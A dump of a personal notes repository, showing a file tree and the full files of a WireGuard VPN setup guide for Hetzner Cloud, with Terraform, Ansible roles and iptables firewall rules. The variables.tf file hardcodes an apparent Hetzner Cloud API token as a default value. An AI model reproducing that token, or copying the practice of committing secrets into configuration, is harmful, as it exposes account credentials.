├── .gitignore ├── 2019-07-28-wireguard-setup-guide ├── README.md ├── ansible │ ├── ansible.cfg │ ├── inventory │ │ └── hosts.yml │ ├── roles │ │ ├── ssh-keys │ │ │ ├── README.md │ │ │ ├── tasks │ │ │ │ └── main.yml │ │ │ ├── templates │ │ │ │ └── authorized_keys.j2 │ │ │ └── vars │ │ │ │ └── main.yml │ │ ├── sshd │ │ │ ├── README.md │ │ │ ├── files │ │ │ │ └── sshd_config │ │ │ ├── handlers │ │ │ │ └── main.yml │ │ │ └── tasks │ │ │ │ └── main.yml │ │ ├── wireguard-config │ │ │ ├── README.md │ │ │ ├── tasks │ │ │ │ └── main.yml │ │ │ ├── templates │ │ │ │ └── example.wg0.conf.j2 │ │ │ └── vars │ │ │ │ └── example.wg0.yml │ │ └── wireguard-install │ │ │ ├── README.md │ │ │ └── tasks │ │ │ └── main.yml │ ├── ssh-keys.yml │ ├── sshd.yml │ ├── wireguard-config.yml │ └── wireguard-install.yml └── tf │ ├── main.tf │ ├── outputs.tf │ ├── user-data │ ├── test.sh │ └── wireguard.sh │ └── variables.tf ├── 2019-08-02-vpn-own-dns ├── README.md └── ansible │ ├── ansible.cfg │ ├── coredns-config.yml │ ├── coredns-install.yml │ ├── inventory │ └── hosts.yml │ └── roles │ ├── coredns-config │ ├── README.md │ ├── defaults │ │ └── main.yml │ ├── files │ │ └── default │ │ │ ├── Corefile │ │ │ └── db.example.com │ └── tasks │ │ └── main.yml │ └── coredns-install │ ├── README.md │ ├── files │ ├── Corefile │ ├── coredns.service │ └── resolv.conf │ └── tasks │ └── main.yml ├── 2019-08-04-dos-insight-api ├── README.md ├── bitcore-node-pubkey │ ├── index.js │ ├── package.json │ ├── utxo-stats │ └── yarn.lock ├── bs58-time-chart │ ├── bs58-time.js │ ├── bs58-time.png │ ├── package.json │ └── yarn.lock └── insight-api-dos │ ├── gen-post-body.js │ ├── insight-dos-body.json │ ├── insight-dos.js │ ├── package.json │ └── yarn.lock ├── 2019-08-06-hetzner-cloud-internal-failover-ip ├── README.md └── tf │ ├── main.tf │ ├── outputs.tf │ └── variables.tf ├── 2019-08-18-loadbalancer-iptables-ipvs ├── Dockerfile ├── README.md └── docker-compose.yml ├── 2019-08-18-virtual-server-with-keepalived ├── Dockerfile ├── README.md ├── docker-compose.yml └── keepalived.conf ├── 2019-08-19-kubernetes-setup-with-kubeadm ├── README.md └── tf │ ├── main.tf │ ├── outputs.tf │ ├── user-data │ └── default.sh │ └── variables.tf ├── 2019-08-20-k8s-coredns-tune-for-external-domains └── README.md ├── 2019-08-22-nodejs-dns ├── README.md ├── coredns │ ├── Corefile │ └── db.example.com └── js │ ├── dns-lookup-cache.js │ ├── dns-lookup-cache2.js │ ├── dns-lookup.js │ ├── dns-resolve-public-dns.js │ ├── dns-resolve.js │ └── test-fn.js ├── 2019-08-23-systemd-instead-pm2 └── README.md ├── 2019-08-30-node-uvthreads-sync-async └── README.md ├── 2019-08-31-libvirt-usage └── README.md ├── 2019-09-01-npm-package-dependents ├── README.md └── show-dependents.js ├── 2019-09-09-node-global-gc └── README.md ├── 2019-09-12-node-perf-hooks ├── README.md └── examples │ ├── binding.gyp │ ├── function.js │ ├── gc.js │ ├── gcweak.cc │ ├── http.js │ ├── http2.js │ ├── mark-measure.js │ ├── node.js │ ├── package.json │ └── yarn.lock ├── 2019-09-21-node-object-gc-callback └── README.md ├── 2019-09-23-node-module-wrapper └── README.md ├── 2019-09-27-node-promise-leaking └── README.md ├── 2019-12-18-llnode-elliptic ├── README.md ├── llnode.js ├── package.json ├── server.js └── yarn.lock ├── 2020-01-02-github-actions-for-prebuildify └── README.md ├── 2020-01-12-cost-of-npm-scripts ├── README.md ├── lock-babel-core.json ├── lock-browserify.json ├── lock-webpack.json ├── package.json ├── stats.js └── yarn.lock ├── 3rd-party-bookmarked-notes.md ├── Makefile └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # ansible 2 | *.retry 3 | 4 | # terraform 5 | .terraform 6 | .terraform.tfstate.lock.info 7 | terraform.tfstate 8 | terraform.tfstate.backup 9 | 10 | # node.js 11 | node_modules 12 | package-lock.json 13 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/README.md: -------------------------------------------------------------------------------- 1 | # Secure VPN tunnel with WireGuard 2 | 3 | ### VPN 4 | 5 | Why we need VPN at all? Even less than year ago (mid 2018) I ignored it, everything what I did at that time was: setup server, open required ports in firewall (if provided), install / update software through SSH. It's just work. But there some few important things why you, probably, should use VPN: 6 | 7 | - Additional security layer. If you have 1 server, it can be easy remember what ports should be opened, which should be closed. But even in this case, you can soon forget what should be done on server if switch to other work for some long period of time. From other side, you can use VPN and worry about opened ports less (but by using VPN I'm not saing that you should not close not required ports, I'm saing that if you will forget to close something, then consequences will be less). More reading: https://hackernoon.com/leaklooker-find-open-databases-in-a-second-9da4249c8472 8 | - With custom subnets in VPN you can restrict access from / to some services. For example, you can run database on server which not have access to Internet at all, but in same time database will be reachable for application in VPN. 9 | - Address persistence. Today you have some public IPs in your invetory for Ansible roles. Tomorrow you recreate server and public IP changed. Instead of fixing inventory you can have persistent private IP. It's not only about Ansible. Same story about DNS records which refer to some server in private network. 10 | 11 | ### Secure tunnel to VPN 12 | 13 | There are plenty of solutions for organizing secure tunnel to VPN, most used probably is [OpenVPN](https://openvpn.net/). But problem here is complexity, just check guide from DigitalOcean: https://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-16-04 — so much steps, keys, certs, configs. In the end, will you be sure that everything was done correct? Also, as I understand, usually certificates generated by admins on server and then provided to users (at least this was way on my previous work). Is this can be cosidered as secure? Never! It's like if somebody will generate SSH keys for you. 14 | 15 | In comparison, [WireGuard](https://www.wireguard.com/) is super simple. Two commands for creating keys, one for private key, one for public key. Simple config in less than 10 lines. Yes, WireGuard have lack of some features, but I think it's possible live without it :) 16 | 17 | So, below I'll provide commands with comments for creating and setup WireGuard server with few servers as pool (where possible applications can be located). [Terraform](https://www.terraform.io/) and [Ansible](https://www.ansible.com/) files can be found in subdirectories `tf` & `ansible`. In the end we will receive something like this: 18 | 19 | ![Alt text](https://g.gravizo.com/source/graphviz1?https://raw.githubusercontent.com/fanatid/notes/master/2019-07-28-wireguard-setup-guide/README.md) 20 | 78 | 79 | We not use `10.0.0.0/24`, because it's look like reserved network by Hetzner (at least gateway for `10.0.0.0/8` on servers in network is `10.0.0.1/32`). Hetzner Network not support firewall through Terraform yet, so we will use iptables for this. Servers from test pool will drop all incoming packets to `eth0` interface (except established TCP connections and ICMP packets). WireGuard server will have same rules as servers from test pool, but allow SSH connections on 22 port and UDP traffic on port 51280 (WireGuard itself). If you sure in your configs, you can also close 22 port on WireGuard server ;) 80 | 81 | ### Infrastructure 82 | 83 | First we need create our infrastructure. In cloud era it's much easier describe and create it with Terraform. Terraform docs for [Hetzner Cloud](https://www.hetzner.com/cloud): https://www.terraform.io/docs/providers/hcloud/index.html 84 | 85 | Before you run commands you need change few lines: 86 | 87 | - [tf/variables.tf#L5](tf/variables.tf#L5) -- your Hetzner Cloud token, see how create it here: https://docs.hetzner.cloud/#overview-getting-started 88 | - [tf/variables.tf#L13](tf/variables.tf#L13) -- SSH key for access to servers 89 | 90 | Great, now everything what you need is run 3 commands in [tf](tf) directory: 91 | 92 | ```bash 93 | terraform init 94 | terraform plan 95 | terraform apply 96 | ``` 97 | 98 | After apply, you should see nearly such output: 99 | 100 | ```bash 101 | Apply complete! Resources: 10 added, 0 changed, 0 destroyed. 102 | 103 | Outputs: 104 | 105 | test_pool_ip4 = { 106 | "116.203.93.123" = "10.0.3.1" 107 | "159.69.217.110" = "10.0.3.2" 108 | } 109 | wireguard_ip4 = 195.201.137.40 => 10.0.2.1 110 | ``` 111 | 112 | Now you should have 1 Network with 2 Subnets and 3 Servers in your account. Iptables rules will be added in `user-data` scripts: [wireguard.sh](tf/user-data/wireguard.sh), [test.sh](tf/user-data/test.sh) (for cloudinit examples, see https://cloudinit.readthedocs.io/en/latest/topics/examples.html). As you can note, we also install python, it's required for running [Ansible](https://www.ansible.com/) playbooks. 113 | 114 | ### WireGuard setup 115 | 116 | ##### Keys generation 117 | 118 | Before we continue, you need install WireGuard locally: https://www.wireguard.com/install/ 119 | 120 | and generate keys, all what you need for this is run from root: 121 | 122 | ```bash 123 | (export i=wg0; cd /etc/wireguard; wg genkey | tee $i.conf.privatekey | wg pubkey > $i.conf.publickey; chmod 600 $i.conf*) 124 | ``` 125 | 126 | Here we create Private Key with `wg genkey`, write output to file `wg0.conf.privatekey` and send to `wg pubkey` in same time for creating Public Key which will be written to `wg0.conf.publickey`. Also, we need set permission `600` for these files. 127 | 128 | When you will create keys, you need fix Public Key in Ansible role `wireguard-config`: [ansible/roles/wireguard-config/vars/example.wg0.yml](ansible/roles/wireguard-config/vars/example.wg0.yml) 129 | 130 | ##### Server WireGuard Setup 131 | 132 | For automated installtion I created 2 small Ansible roles, so everything what you need is run: 133 | 134 | ```bash 135 | ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook -i 'root@195.201.137.40,' ./wireguard-install.yml ./wireguard-config.yml -e 'target=all wg_host=example wg_name=wg0' 136 | ``` 137 | 138 | do not forget change `195.201.137.40` to IPv4 address which map to `10.0.2.1`. 139 | 140 | If you made everything how described here and Hetzner cloud/Terraform/Ansible did not changed anything you can see only 1 error: 141 | 142 | ```bash 143 | fatal: [root@195.201.137.40]: FAILED! => {"changed": false, "module_stderr": "/bin/sh: 1: /usr/bin/python: not found\n", "module_stdout": "", "msg": "The module failed to execute correctly, you probably need to set the interpreter.\nSee stdout/stderr for the exact error", "rc": 127} 144 | ``` 145 | 146 | this means that `python` still not installed by `user-data` script. Probably you need wait little more before Ansible will able to work. 147 | 148 | If everything was fine you should to see something like: 149 | 150 | ```bash 151 | ok: [root@195.201.137.40] => { 152 | "msg": "Server WireGuard Public Key: u6ez/wlC3G0R83DM+7pDx44GkkvWeywd0iX///YUCxs=" 153 | } 154 | ``` 155 | 156 | If in future you will provide / remove access to users you need adjust users list in [ansible/roles/wireguard-config/vars/example.wg0.yml](ansible/roles/wireguard-config/vars/example.wg0.yml) and use role `wireguard-config` for uploading and applying config. 157 | 158 | ##### Local WireGuard config 159 | 160 | Now you have everything for local WireGuard config, just put it to `/etc/wireguard/wg0.conf` (with permission `600`): 161 | 162 | ```ini 163 | [Interface] 164 | Address = 10.0.1.1/32 165 | PostUp = wg set %i private-key <(cat /etc/wireguard/%i.conf.privatekey) 166 | 167 | [Peer] 168 | PublicKey = u6ez/wlC3G0R83DM+7pDx44GkkvWeywd0iX///YUCxs= 169 | AllowedIPs = 10.0.0.0/8 170 | Endpoint = 195.201.137.40:51820 171 | PersistentKeepalive = 25 172 | ``` 173 | 174 | as you can note, `PublicKey` and `Ednpoint` should be changed to appropriate values. 175 | 176 | And now you can start connection with `wg-quick`: 177 | 178 | ```bash 179 | $ wg-quick up wg0 180 | [#] ip link add wg0 type wireguard 181 | [#] wg setconf wg0 /dev/fd/63 182 | [#] ip -4 address add 10.0.1.1/32 dev wg0 183 | [#] ip link set mtu 1420 up dev wg0 184 | [#] ip -4 route add 10.0.0.0/8 dev wg0 185 | [#] wg set wg0 private-key <(cat /etc/wireguard/wg0.conf.privatekey) 186 | ``` 187 | 188 | if you have same output then `ping 10.0.2.1` should work, as SSH to `10.0.3.1` / `10.0.3.2`. 189 | 190 | For startup with system you can activete it with `systemd`: `systemctl enable wg-quick@wg0`. 191 | 192 | ##### Reverse route 193 | 194 | Because subnet for users (`10.0.1.0/24`) is not part of Hetzner Network, we can not send packets from test pool servers (`10.0.3.0/24`) to users (problem is that gateway `10.0.0.1/32` in Hetzner Network do not know anything about our WireGuard users). This can be solved if we define additional route where all packets with destination `10.0.1.0/24` will go to our WireGuard server `10.0.2.1/32`, or in Terraform: 195 | 196 | ```terraform 197 | resource "hcloud_network_route" "reverse" { 198 | network_id = "${hcloud_network.default.id}" 199 | destination = "10.0.1.0/24" 200 | gateway = "10.0.2.1" 201 | } 202 | ``` 203 | 204 | after this our servers in private network will able start communication with our WireGuard users. 205 | 206 | ### SSH keys 207 | 208 | In addition to WireGuard ansible roles I created 2 roles for simple SSH keys management on servers. Before you run it, you need change key in [ansible/roles/ssh-keys/vars/main.yml](ansible/roles/ssh-keys/vars/main.yml). 209 | 210 | - Role `sshd` upload `sshd_config` which disable password-based authentication. 211 | - Role `ssh-keys` upload defined keys to `/root/.ssh/authorized_keys`. Be careful, if your key not in list and you run role you will lose access to server! 212 | 213 | ```bash 214 | ansible-playbook -i ./inventory/hosts.yml ./sshd.yml ./ssh-keys.yml -e 'target=all' 215 | ``` 216 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | forks = 10 3 | interpreter_python = /usr/bin/python 4 | 5 | # default user to use for playbooks if user is not specified 6 | # (/usr/bin/ansible will use current user as default) 7 | remote_user = root 8 | 9 | # retry files 10 | # When a playbook fails by default a .retry file will be created in ~/ 11 | # You can disable this feature by setting retry_files_enabled to False 12 | # and you can change the location of the files by setting retry_files_save_path 13 | retry_files_enabled = False 14 | 15 | [inventory] 16 | # enable inventory plugins, default: 'host_list', 'script', 'yaml', 'ini', 'auto' 17 | enable_plugins = yaml, host_list 18 | 19 | [ssh_connection] 20 | 21 | # ssh arguments to use 22 | # Leaving off ControlPersist will result in poor performance, so use 23 | # paramiko on older platforms rather than removing it, -C controls compression use 24 | ssh_args = -C -o ControlMaster=auto -o ControlPersist=60s -o PreferredAuthentications=publickey 25 | 26 | # Enabling pipelining reduces the number of SSH operations required to 27 | # execute a module on the remote server. This can result in a significant 28 | # performance improvement when enabled, however when using "sudo:" you must 29 | # first disable 'requiretty' in /etc/sudoers 30 | # 31 | # By default, this option is disabled to preserve compatibility with 32 | # sudoers configurations that have requiretty (the default on many distros). 33 | # 34 | pipelining = True 35 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/inventory/hosts.yml: -------------------------------------------------------------------------------- 1 | --- 2 | all: 3 | children: 4 | wireguard: 5 | hosts: 6 | # wireguard_ip4 7 | # ? 8 | 10.0.2.1: 9 | test: 10 | hosts: 11 | 10.0.3.1: 12 | 10.0.3.2: 13 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/ssh-keys/README.md: -------------------------------------------------------------------------------- 1 | ## ssh-keys 2 | 3 | Add / remove ssh keys on servers. 4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i ./inventory/hosts.yml ./ssh-keys.yml 9 | ``` 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/ssh-keys/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: upload authorized_keys 3 | template: 4 | src: templates/authorized_keys.j2 5 | dest: /root/.ssh/authorized_keys 6 | owner: root 7 | group: root 8 | mode: 0600 9 | become: true 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/ssh-keys/templates/authorized_keys.j2: -------------------------------------------------------------------------------- 1 | {% for item in users|dict2items %} 2 | # {{ item.key }} 3 | {{ item.value }} {{ item.key }} 4 | {# empty line between keys, but not for last key #} 5 | {% if not loop.last %} 6 | 7 | {% endif %} 8 | {% endfor %} 9 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/ssh-keys/vars/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | users: 3 | Kirill Fomichev (github.com/fanatid): ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb 4 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/sshd/README.md: -------------------------------------------------------------------------------- 1 | ## sshd 2 | 3 | Upload sshd config with disabled password-based authentication. 4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i ./inventory/hosts.yml ./sshd.yml -e 'target=all' 9 | ``` 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/sshd/files/sshd_config: -------------------------------------------------------------------------------- 1 | AcceptEnv LANG LC_* 2 | ChallengeResponseAuthentication no 3 | PasswordAuthentication no 4 | PrintMotd no 5 | Subsystem sftp /usr/lib/openssh/sftp-server 6 | UsePAM yes 7 | X11Forwarding yes 8 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/sshd/handlers/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: restart sshd 3 | service: 4 | name: sshd 5 | state: restarted 6 | enabled: yes 7 | become: yes 8 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/sshd/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: upload sshd_config 3 | copy: 4 | src: files/sshd_config 5 | dest: /etc/ssh/sshd_config 6 | owner: root 7 | group: root 8 | mode: 0644 9 | become: true 10 | notify: restart sshd 11 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-config/README.md: -------------------------------------------------------------------------------- 1 | ## wireguard-config 2 | 3 | - Create [WireGuard](https://www.wireguard.com/) Keys if they not exists. 4 | - Update WireGuard configuration for peers from vars. 5 | - Add new / remove outdated peers from current interface. 6 | - Print WireGuard Server Public Key. 7 | 8 | ### usage 9 | 10 | Additional to playbook `target` variable, 2 extra variables for role should be defined: 11 | 12 | - `wg_host` -- name of wireguard vars / template 13 | - `wg_name` -- name of wireguard interface on host machine 14 | 15 | ```bash 16 | ansible-playbook -i 'root@X.X.X.X,' ./wireguard-config.yml -e 'target=all wg_host=example wg_name=wg0' 17 | ``` 18 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-config/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - block: 3 | # Create Keys if not exists 4 | - name: check wg keys 5 | stat: 6 | path: /etc/wireguard/{{ wg_name }}.conf.privatekey 7 | register: wg_privkey 8 | 9 | - name: generate keys 10 | shell: | 11 | cd /etc/wireguard 12 | wg genkey | tee {{ wg_name }}.conf.privatekey | wg pubkey > {{ wg_name }}.conf.publickey 13 | chmod 600 {{ wg_name }}.conf* 14 | when: wg_privkey.stat.exists == False 15 | 16 | 17 | # WireGuard config and service 18 | - name: load users for wireguard 19 | include_vars: 20 | file: vars/{{ wg_host }}.{{ wg_name }}.yml 21 | 22 | - name: upload wireguard conf 23 | template: 24 | src: templates/{{ wg_host }}.{{ wg_name }}.conf.j2 25 | dest: /etc/wireguard/{{ wg_name }}.conf 26 | owner: root 27 | group: root 28 | mode: 0600 29 | register: wg_conf 30 | 31 | - name: activate wireguard 32 | systemd: 33 | name: wg-quick@{{ wg_name }}.service 34 | state: started 35 | enabled: yes 36 | 37 | - name: add / remove wireguard peers 38 | shell: | 39 | # add new peers 40 | wg addconf {{ wg_name }} <(wg-quick strip {{ wg_name }}) 41 | 42 | # remove missed peers 43 | # such way, because wg setconf drop established connections 44 | wg show {{ wg_name }} | grep peer | awk '{ print $2 }' | xargs -L1 -I{} bash -c 'if ! wg-quick strip {{ wg_name }} | grep -q "^PublicKey = {}$"; then wg set {{ wg_name }} peer {} remove; fi' 45 | args: 46 | executable: /bin/bash 47 | when: wg_conf.changed 48 | 49 | 50 | # Print Public Key 51 | - name: read remote Public Key 52 | shell: cat /etc/wireguard/{{ wg_name }}.conf.publickey 53 | changed_when: false 54 | register: wg_pubkey 55 | 56 | - name: print server Public Key 57 | debug: 58 | msg: "Server WireGuard Public Key: {{ wg_pubkey.stdout }}" 59 | 60 | become: true 61 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-config/templates/example.wg0.conf.j2: -------------------------------------------------------------------------------- 1 | [Interface] 2 | Address = 10.0.2.1/24 3 | ListenPort = 51820 4 | PostUp = wg set %i private-key <(cat /etc/wireguard/%i.conf.privatekey); iptables -t nat -A POSTROUTING -o ens10 -s 10.0.0.0/8 -j MASQUERADE 5 | PostDown = iptables -t nat -D POSTROUTING -o ens10 -s 10.0.0.0/8 -j MASQUERADE 6 | {% for user in users %} 7 | 8 | # {{ user.comment }} 9 | [Peer] 10 | PublicKey = {{ user.publickey }} 11 | AllowedIPs = {{ user.ips }} 12 | {% endfor %} 13 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-config/vars/example.wg0.yml: -------------------------------------------------------------------------------- 1 | --- 2 | users: 3 | - comment: Kirill Fomichev 4 | publickey: DRr6TRMaX84Em1DlPsgRX1jt+4F5kmkt/iC0mHfD1Tc= 5 | ips: 10.0.1.1/32 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-install/README.md: -------------------------------------------------------------------------------- 1 | ## wireguard-install 2 | 3 | Install [WireGuard](https://www.wireguard.com/). 4 | 5 | ### usage 6 | 7 | ```bash 8 | ansible-playbook -i 'root@X.X.X.X,' ./wireguard-install.yml -e 'target=all' 9 | ``` 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/roles/wireguard-install/tasks/main.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - block: 3 | - name: install software-properties-common 4 | apt: 5 | name: 6 | - software-properties-common 7 | state: present 8 | cache_valid_time: 86400 9 | 10 | - name: add wireguard apt repository 11 | apt_repository: 12 | repo: ppa:wireguard/wireguard 13 | 14 | - name: fetch current kernel version 15 | shell: uname -r 16 | register: kernelversion 17 | changed_when: false 18 | 19 | - name: install wireguard 20 | apt: 21 | name: 22 | - linux-headers-generic 23 | - linux-headers-{{ kernelversion.stdout }} 24 | - wireguard 25 | state: present 26 | cache_valid_time: 86400 27 | 28 | - name: Add wireguard module 29 | modprobe: 30 | name: wireguard 31 | state: present 32 | 33 | - name: add ip forwarding to sysctl.conf 34 | sysctl: 35 | name: net.ipv4.ip_forward 36 | value: 1 37 | 38 | become: true 39 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/ssh-keys.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target | default('all') }}" 3 | gather_facts: false 4 | roles: 5 | - name: ssh-keys 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/sshd.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target | default('all') }}" 3 | gather_facts: false 4 | roles: 5 | - name: sshd 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/wireguard-config.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target }}" 3 | gather_facts: false 4 | roles: 5 | - name: wireguard-config 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/ansible/wireguard-install.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: "{{ target }}" 3 | gather_facts: false 4 | roles: 5 | - name: wireguard-install 6 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/main.tf: -------------------------------------------------------------------------------- 1 | provider "hcloud" { 2 | version = "~> 1.11" 3 | token = "${var.hcloud_token}" 4 | } 5 | 6 | # SSH keys 7 | resource "hcloud_ssh_key" "default" { 8 | count = "${length(var.ssh_keys)}" 9 | 10 | name = "${keys(var.ssh_keys)[count.index]}" 11 | public_key = "${values(var.ssh_keys)[count.index]}" 12 | } 13 | 14 | # Private Network and subnets 15 | resource "hcloud_network" "default" { 16 | name = "WireGuard Example" 17 | ip_range = "10.0.0.0/8" 18 | } 19 | 20 | resource "hcloud_network_subnet" "vpn" { 21 | network_id = "${hcloud_network.default.id}" 22 | type = "server" 23 | network_zone = "eu-central" 24 | ip_range = "10.0.2.0/24" 25 | } 26 | 27 | resource "hcloud_network_subnet" "test" { 28 | network_id = "${hcloud_network.default.id}" 29 | type = "server" 30 | network_zone = "eu-central" 31 | ip_range = "10.0.3.0/24" 32 | } 33 | 34 | # WireGuard Server 35 | resource "hcloud_server" "wireguard" { 36 | name = "wireguard" 37 | image = "${var.wireguard_server.image}" 38 | server_type = "${var.wireguard_server.server_type}" 39 | datacenter = "${var.wireguard_server.datacenter}" 40 | user_data = "${file("./user-data/wireguard.sh")}" 41 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 42 | 43 | lifecycle { 44 | prevent_destroy = true 45 | } 46 | } 47 | 48 | resource "hcloud_server_network" "wireguard_network" { 49 | network_id = "${hcloud_network.default.id}" 50 | server_id = "${hcloud_server.wireguard.id}" 51 | ip = "10.0.2.1" 52 | } 53 | 54 | # Test Nodes 55 | resource "hcloud_server" "test" { 56 | count = "${var.test_pool_size}" 57 | 58 | name = "test-${count.index}" 59 | image = "${var.test_pool_server.image}" 60 | server_type = "${var.test_pool_server.server_type}" 61 | datacenter = "${var.test_pool_server.datacenter}" 62 | user_data = "${file("./user-data/test.sh")}" 63 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 64 | } 65 | 66 | resource "hcloud_server_network" "test_network" { 67 | count = length(hcloud_server.test) 68 | 69 | network_id = "${hcloud_network.default.id}" 70 | server_id = "${hcloud_server.test[count.index].id}" 71 | ip = "10.0.3.${count.index + 1}" 72 | } 73 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/outputs.tf: -------------------------------------------------------------------------------- 1 | output "wireguard_ip4" { 2 | description = "Map of public ipv4 to private ipv4 for VPN (WireGuard) Server" 3 | value = "${hcloud_server.wireguard.ipv4_address} => ${hcloud_server_network.wireguard_network.ip}" 4 | } 5 | 6 | output "test_pool_ip4" { 7 | description = "Map of public ipv4 addresses to private ipv4 address of Servers from test pool" 8 | value = { for i in range(length(hcloud_server.test)) : hcloud_server.test[i].ipv4_address => hcloud_server_network.test_network[i].ip } 9 | } 10 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/user-data/test.sh: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | packages: 3 | - python 4 | - iptables-persistent 5 | runcmd: 6 | - iptables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 7 | - iptables -A INPUT -i eth0 -p icmp -j ACCEPT # Allow ICMP 8 | - iptables -A INPUT -i eth0 -j DROP # Drop rest 9 | - iptables-save > /etc/iptables/rules.v4 # Save ipv4 rules 10 | 11 | - ip6tables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 12 | - ip6tables -A INPUT -i eth0 -p icmpv6 -j ACCEPT # Allow ICMP 13 | - ip6tables -A INPUT -i eth0 -j DROP # Drop rest 14 | - ip6tables-save > /etc/iptables/rules.v6 # Save ipv6 rules 15 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/user-data/wireguard.sh: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | packages: 3 | - python 4 | - iptables-persistent 5 | runcmd: 6 | - iptables -A INPUT -i eth0 -p udp --dport 51820 -j ACCEPT # Allow WireGuard 7 | - iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT # Allow SSH 8 | - iptables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 9 | - iptables -A INPUT -i eth0 -p icmp -j ACCEPT # Allow ICMP 10 | - iptables -A INPUT -i eth0 -j DROP # Drop rest 11 | - iptables-save > /etc/iptables/rules.v4 # Save ipv4 rules 12 | 13 | - ip6tables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 14 | - ip6tables -A INPUT -i eth0 -p icmpv6 -j ACCEPT # Allow ICMP 15 | - ip6tables -A INPUT -i eth0 -j DROP # Drop rest 16 | - ip6tables-save > /etc/iptables/rules.v6 # Save ipv6 rules 17 | -------------------------------------------------------------------------------- /2019-07-28-wireguard-setup-guide/tf/variables.tf: -------------------------------------------------------------------------------- 1 | variable "hcloud_token" { 2 | type = string 3 | description = "Hetzner Cloud API Token" 4 | 5 | default = "A2fMl7W5Q7aN5J4pZcmFMOuKjRKNvPaBbH4VLBkuC1Cn5aVbLCEyikt2XFhB3wiC" 6 | } 7 | 8 | variable "ssh_keys" { 9 | type = map(string) 10 | description = "Map of SSH Keys on servers by default, name => key" 11 | 12 | default = { 13 | "Kirill Fomichev" = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb fanatid@ya.ru" 14 | } 15 | } 16 | 